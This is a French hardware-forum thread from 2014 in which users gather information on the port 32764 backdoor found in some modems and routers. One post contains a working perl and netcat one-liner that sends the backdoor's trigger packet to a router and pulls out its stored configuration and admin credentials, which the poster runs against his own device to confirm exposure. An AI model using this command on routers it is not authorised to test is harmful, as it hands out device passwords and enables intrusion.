Forum |  HardWare.fr | News | Articles | PC | Prix | S'identifier | S'inscrire | Shop Recherche
1619 connectés 

  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Sécurité

  Backdoor sur les modem/routeur port 32764 ==> centralisation infos

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Backdoor sur les modem/routeur port 32764 ==> centralisation infos

n°731854
burn2
ça rox du poney
Posté le 02-01-2014 à 16:18:43  profilanswer
 

Bonjour, une information vient de sortir, certains modem/routeurs contiendraient une backdoor permettant de récupérer à distance la conf du routeur et surtout son mot de passe...
L'article en question:
http://www.numerama.com/magazine/2 [...] tgear.html

 

Les sources et les informations:
https://github.com/elvanderb/TCP-32764

 


Ce topic aura donc pour but de centraliser les informations, voir si votre modem/routeur est touché ou pas.

 

Je possède un netgear V2 dg834G. Je testerais le script. J'ai testé un telnet sur le port 32764 il ne me répond visiblement rien... Et un nmap dans le réseau interne sur le routeur, ne me donne que le port 80 (donc l'interface admin).

 


Au niveau de la faille est-elle atteignable depuis l'extérieur ou juste depuis le réseau interne?


Message édité par burn2 le 02-01-2014 à 16:24:45

---------------
"C'est vrais qu'un type aussi pénible de jour on serait en droit d'espérer qu'il fasse un break de nuit mais bon …"
mood
Publicité
Posté le 02-01-2014 à 16:18:43  profilanswer
 

n°731862
burn2
ça rox du poney
Posté le 02-01-2014 à 16:29:52  profilanswer
 

Je viens de tester avec ces commandes:

Citation :


perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_


 
Et il me répond bien exactement ma conf!!!! Donc faille confirmée pour mon modem routeur!


---------------
"C'est vrais qu'un type aussi pénible de jour on serait en droit d'espérer qu'il fasse un break de nuit mais bon …"

Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Réseaux grand public / SoHo
  Sécurité

  Backdoor sur les modem/routeur port 32764 ==> centralisation infos

 

Sujets relatifs
Besoin de conseil achat de switch/routeur wifi gigabitRoutage port D-link DIR-615
Ancien modem Wanadoo SpeedTouch.. poubelle?routeur planté (RT-AC66U)
routeur wifi derrière un reouteur filaireInfos Hardware sur Dedibox@SCL
Quel routeur supporte des sessions IPSec multiples ?VISTA - Problème connexion routeur et internet
Extension réseau Livebox via switch ou routeur WiFi sur CPL 
Plus de sujets relatifs à : Backdoor sur les modem/routeur port 32764 ==> centralisation infos


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR